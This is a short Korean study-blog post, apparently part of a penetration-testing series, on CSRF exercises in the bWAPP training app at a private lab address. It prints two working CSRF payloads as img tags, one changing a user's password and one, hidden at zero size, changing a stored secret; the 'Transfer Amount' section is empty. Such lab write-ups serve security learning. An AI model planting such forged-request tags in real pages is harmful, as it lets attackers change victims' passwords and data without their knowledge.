IT 공부용
11. A8_CSRF(Cross site request forgery) 본문
● CSRF (Change Password)
비밀번호 바꾸는 form이네 이거말고 바로 다른곳에서 바꿀 수 있게 ㄱㄱ;
<img src="http://192.168.50.36/bWAPP/csrf_1.php?password_new=apple&password_conf=apple&action=change">
이거 입력하면
여기서
id : bee
pwd : apple로 바꿔짐;
● CSRF (Change Secret)
<img src="http://192.168.50.36/bWAPP/csrf_3.php?secret=benmin%27qwer&login=bee&action=change" height=0 width=0> ㄱㄱ
● CSRF (Transfer Amount)
'▶ 모의 해킹' 카테고리의 다른 글
| 13. Unvalidated Redirects & Forwards (0) | 2022.10.06 |
|---|---|
| 12. A9 – Using Known Vulnerable Components (알려진 취약점이 있는 컴포넌트 사용) (0) | 2022.10.06 |
| 8. A5. Security Misconfiguration(보안 설정 오류) (0) | 2022.10.04 |
| 7. A4 (취약한 직접 객체 참조) (0) | 2022.09.30 |
| 6. A3_ XSS (0) | 2022.09.29 |
'▶ 모의 해킹' Related Articles
more
